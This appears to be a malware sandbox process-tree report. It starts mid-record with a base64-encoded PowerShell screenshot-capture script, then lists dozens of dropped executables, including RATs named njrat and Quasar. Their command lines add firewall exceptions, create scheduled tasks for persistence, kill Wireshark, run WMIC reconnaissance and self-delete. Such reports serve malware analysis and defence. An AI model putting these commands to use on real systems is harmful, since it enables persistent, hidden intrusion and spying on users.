B7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵PID:5144
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x1inut20\x1inut20.cmdline"7⤵PID:5492
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2CA.tmp" "c:\Users\Admin\AppData\Local\Temp\x1inut20\CSCB8B43C939DDA448DAF98C0ACB3490B5.TMP"8⤵PID:2252
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:2284
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:3320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4160
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:4644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:4444
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:6120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:8052
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:4760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:6824
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:4792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:8772
-
C:\Windows\system32\getmac.exegetmac6⤵PID:4920
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\4422_8390.exe"C:\Users\Admin\AppData\Local\Temp\a\4422_8390.exe"3⤵PID:7596
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\4181_461.exe"C:\Users\Admin\AppData\Local\Temp\a\4181_461.exe"3⤵PID:7988
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵PID:4848
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\EmmetPROD.exe"C:\Users\Admin\AppData\Local\Temp\a\EmmetPROD.exe"3⤵PID:4220
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic computersystem get name, TotalPhysicalMemory /Value && wmic os get caption /Value && wmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /Value && ipconfig | find "IPv4" | find /N ":" | find "[1]"4⤵PID:6776
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem get name, TotalPhysicalMemory /Value5⤵PID:3496
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic os get caption /Value5⤵PID:6672
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /Value5⤵PID:3320
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig5⤵
- Gathers network information
PID:7664
-
-
C:\Windows\SysWOW64\find.exefind "IPv4"5⤵PID:4396
-
-
C:\Windows\SysWOW64\find.exefind /N ":"5⤵PID:7068
-
-
C:\Windows\SysWOW64\find.exefind "[1]"5⤵PID:5944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\1374_2790.exe"C:\Users\Admin\AppData\Local\Temp\a\1374_2790.exe"3⤵PID:4812
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"4⤵PID:1596
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\29.exe"C:\Users\Admin\AppData\Local\Temp\a\29.exe"3⤵PID:5176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 3644⤵
- Program crash
PID:6952
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\5.exe"C:\Users\Admin\AppData\Local\Temp\a\5.exe"3⤵PID:7880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 3604⤵
- Program crash
PID:8568
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\1.exe"C:\Users\Admin\AppData\Local\Temp\a\1.exe"3⤵PID:8504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8504 -s 3604⤵
- Program crash
PID:9796
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\6.exe"C:\Users\Admin\AppData\Local\Temp\a\6.exe"3⤵PID:10236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10236 -s 3604⤵
- Program crash
PID:3048
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\35.exe"C:\Users\Admin\AppData\Local\Temp\a\35.exe"3⤵PID:7528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 3604⤵
- Program crash
PID:8324
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\43.exe"C:\Users\Admin\AppData\Local\Temp\a\43.exe"3⤵PID:7492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 3604⤵
- Program crash
PID:5724
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\41.exe"C:\Users\Admin\AppData\Local\Temp\a\41.exe"3⤵PID:2464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 2204⤵
- Program crash
PID:2880
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\42.exe"C:\Users\Admin\AppData\Local\Temp\a\42.exe"3⤵PID:9456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9456 -s 2164⤵
- Program crash
PID:9988
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\4.exe"C:\Users\Admin\AppData\Local\Temp\a\4.exe"3⤵PID:892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 3764⤵
- Program crash
PID:6436
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\3.exe"C:\Users\Admin\AppData\Local\Temp\a\3.exe"3⤵PID:1012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 3644⤵
- Program crash
PID:9372
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\38.exe"C:\Users\Admin\AppData\Local\Temp\a\38.exe"3⤵PID:9100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9100 -s 3644⤵
- Program crash
PID:7564
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\16.exe"C:\Users\Admin\AppData\Local\Temp\a\16.exe"3⤵PID:9132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9132 -s 2204⤵
- Program crash
PID:9884
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\2.exe"C:\Users\Admin\AppData\Local\Temp\a\2.exe"3⤵PID:9920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9920 -s 3604⤵
- Program crash
PID:8884
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\25.exe"C:\Users\Admin\AppData\Local\Temp\a\25.exe"3⤵PID:5544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 3644⤵
- Program crash
PID:3812
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\goodboy.exe"C:\Users\Admin\AppData\Local\Temp\a\goodboy.exe"3⤵PID:8552
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD0~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD0~1.EXE4⤵PID:7196
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c214.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c214.exe4⤵PID:6012
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c214.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c214.exe"5⤵PID:5020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 3126⤵
- Program crash
PID:9708
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 8205⤵
- Program crash
PID:8228
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Microsoft_Hardware_Launch.exe"C:\Users\Admin\AppData\Local\Temp\a\Microsoft_Hardware_Launch.exe"3⤵PID:6540
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\Microsoft_Hardware_Launch.exe" "Microsoft_Hardware_Launch.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:8628
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\lastest.exe"C:\Users\Admin\AppData\Local\Temp\a\lastest.exe"3⤵PID:1516
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵PID:7504
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:4800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ApplicationFrameHost.exe5⤵
- Kills process with taskkill
PID:8896
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\heo.exe"C:\Users\Admin\AppData\Local\Temp\a\heo.exe"3⤵PID:7404
-
-
C:\Users\Admin\AppData\Local\Temp\a\Server1.exe"C:\Users\Admin\AppData\Local\Temp\a\Server1.exe"3⤵PID:5316
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\Server1.exe" "Server1.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:8380
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\856.exe"C:\Users\Admin\AppData\Local\Temp\a\856.exe"3⤵PID:3440
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\856.exe" "856.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:8220
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\856.exe"4⤵
- Modifies Windows Firewall
PID:5288
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\856.exe" "856.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:1440
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"4⤵PID:4080
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:7932
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"5⤵
- Modifies Windows Firewall
PID:1132
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:2000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn StUpdate /tr C:\Users\Admin\AppData\Local\Temp/StUpdate.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:7772
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\newest.exe"C:\Users\Admin\AppData\Local\Temp\a\newest.exe"3⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵PID:8888
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:6496
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"5⤵
- Modifies Windows Firewall
PID:7904
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:9596
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 12845⤵PID:9592
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ServerRat.exe"C:\Users\Admin\AppData\Local\Temp\a\ServerRat.exe"3⤵PID:8296
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\ServerRat.exe" "ServerRat.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:7056
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Fast%20Download.exe"C:\Users\Admin\AppData\Local\Temp\a\Fast%20Download.exe"3⤵PID:8956
-
-
C:\Users\Admin\AppData\Local\Temp\a\enai2.exe"C:\Users\Admin\AppData\Local\Temp\a\enai2.exe"3⤵PID:6760
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\enai2.exe" "enai2.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:9036
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\njrat.exe"C:\Users\Admin\AppData\Local\Temp\a\njrat.exe"3⤵PID:9032
-
C:\Windows\rundll32.exe"C:\Windows\rundll32.exe"4⤵PID:7292
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\rundll32.exe" "rundll32.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:1832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\joiner.exe"C:\Users\Admin\AppData\Local\Temp\a\joiner.exe"3⤵PID:8964
-
-
C:\Users\Admin\AppData\Local\Temp\a\testme.exe"C:\Users\Admin\AppData\Local\Temp\a\testme.exe"3⤵PID:9980
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\testme.exe" "testme.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:9056
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\sela.exe"C:\Users\Admin\AppData\Local\Temp\a\sela.exe"3⤵PID:4304
-
-
C:\Users\Admin\AppData\Local\Temp\a\444.exe"C:\Users\Admin\AppData\Local\Temp\a\444.exe"3⤵PID:8176
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"4⤵PID:3260
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:10000
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\main.exe"C:\Users\Admin\AppData\Local\Temp\a\main.exe"3⤵PID:9408
-
C:\ProgramData\dllhost.exe"C:\ProgramData\dllhost.exe"4⤵PID:6992
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe5⤵
- Kills process with taskkill
PID:8512
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f5⤵PID:3408
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe5⤵
- Scheduled Task/Job: Scheduled Task
PID:9788
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "C:\Users\Admin\AppData\Local\Temp\a\main.exe"4⤵PID:5708
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 55⤵PID:8552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\startup.exe"C:\Users\Admin\AppData\Local\Temp\a\startup.exe"3⤵PID:3864
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵PID:2496
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:3440
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"5⤵
- Modifies Windows Firewall
PID:8656
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:4360
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 12405⤵PID:1504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\cnct.exe"C:\Users\Admin\AppData\Local\Temp\a\cnct.exe"3⤵PID:8820
-
C:\Users\Admin\AppData\Local\Temp\dlscord.exe"C:\Users\Admin\AppData\Local\Temp\dlscord.exe"4⤵PID:5772
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\dlscord.exe" "dlscord.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:8256
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\mos%20ssssttttt.exe"C:\Users\Admin\AppData\Local\Temp\a\mos%20ssssttttt.exe"3⤵PID:9288
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\mos%20ssssttttt.exe" "mos%20ssssttttt.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:1184
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\mos%20ssssttttt.exe"4⤵
- Modifies Windows Firewall
PID:6424
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\mos%20ssssttttt.exe" "mos%20ssssttttt.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:10180
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\njSilent.exe"C:\Users\Admin\AppData\Local\Temp\a\njSilent.exe"3⤵PID:9304
-
C:\Windows\svchost.exe"C:\Windows\svchost.exe"4⤵PID:1596
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:7144
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\system.exe"C:\Users\Admin\AppData\Local\Temp\a\system.exe"3⤵PID:9044
-
C:\Users\Admin\AppData\Local\Temp\system.exe"C:\Users\Admin\AppData\Local\Temp\system.exe"4⤵PID:9244
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\system.exe" "system.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:5388
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\eo.exe"C:\Users\Admin\AppData\Local\Temp\a\eo.exe"3⤵PID:512
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\eo.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4324
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\a\Client-built.exe"3⤵PID:6256
-
-
C:\Users\Admin\AppData\Local\Temp\a\rektupp.exe"C:\Users\Admin\AppData\Local\Temp\a\rektupp.exe"3⤵PID:7924
-
-
C:\Users\Admin\AppData\Local\Temp\a\svhost.exe"C:\Users\Admin\AppData\Local\Temp\a\svhost.exe"3⤵PID:3760
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:9204
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Java32.exe"C:\Users\Admin\AppData\Local\Temp\a\Java32.exe"3⤵PID:4916
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6740
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\x.exe"C:\Users\Admin\AppData\Local\Temp\a\x.exe"3⤵PID:5872
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "x" /sc ONLOGON /tr "C:\Windows\system32\SubDir\x.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:9784
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"3⤵PID:4540
-
C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"4⤵PID:9740
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\test.exe"C:\Users\Admin\AppData\Local\Temp\a\test.exe"3⤵PID:6060
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windowns Client Startup" /sc ONLOGON /tr "C:\Windows\system32\Quasar\User Application Data.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4628
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\vanilla.exe"C:\Users\Admin\AppData\Local\Temp\a\vanilla.exe"3⤵PID:4920
-
-
-
C:\Users\Admin\AppData\Local\Temp\7692.tmp.exeC:\Users\Admin\AppData\Local\Temp\7692.tmp.exe2⤵PID:4376
-
C:\Users\Admin\AppData\Local\Temp\7692.tmp.exeC:\Users\Admin\AppData\Local\Temp\7692.tmp.exe3⤵PID:3052
-
-
C:\Windows\SysWOW64\sxstrace.exe"C:\Windows\SysWOW64\sxstrace.exe"3⤵PID:2816
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"4⤵PID:7256
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\743D.tmp.exeC:\Users\Admin\AppData\Local\Temp\743D.tmp.exe2⤵PID:7520
-
C:\Windows\SysWOW64\runonce.exe"C:\Windows\SysWOW64\runonce.exe"3⤵PID:3484
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"4⤵PID:5332
-
-
-
C:\Windows\SysWOW64\runonce.exe"C:\Windows\SysWOW64\runonce.exe"3⤵PID:6824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Appear" /tr "wscript //B 'C:\Users\Admin\AppData\Local\InfoLink Dynamics\InfoForge.js'" /sc minute /mo 5 /F2⤵PID:7808
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Appear" /tr "wscript //B 'C:\Users\Admin\AppData\Local\InfoLink Dynamics\InfoForge.js'" /sc minute /mo 5 /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InfoForge.url" & echo URL="C:\Users\Admin\AppData\Local\InfoLink Dynamics\InfoForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InfoForge.url" & exit2⤵PID:6372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 760 -ip 7601⤵PID:4616
-
C:\Users\Public\Discord.exeC:\Users\Public\Discord.exe1⤵PID:4916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5688 -ip 56881⤵PID:6708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7644 -ip 76441⤵PID:7792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 8060 -ip 80601⤵PID:3524
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:7628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7068 -ip 70681⤵PID:8160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3084 -ip 30841⤵PID:2044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1180 -ip 11801⤵PID:3956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5176 -ip 51761⤵PID:4288
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 7880 -ip 78801⤵PID:9004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 8504 -ip 85041⤵PID:5732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10236 -ip 102361⤵PID:1748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7528 -ip 75281⤵PID:8736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7492 -ip 74921⤵PID:3780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2464 -ip 24641⤵PID:5984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 9456 -ip 94561⤵PID:4020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 892 -ip 8921⤵PID:4800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1012 -ip 10121⤵PID:7992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 9100 -ip 91001⤵PID:7496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 9132 -ip 91321⤵PID:8320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 9920 -ip 99201⤵PID:9984
-
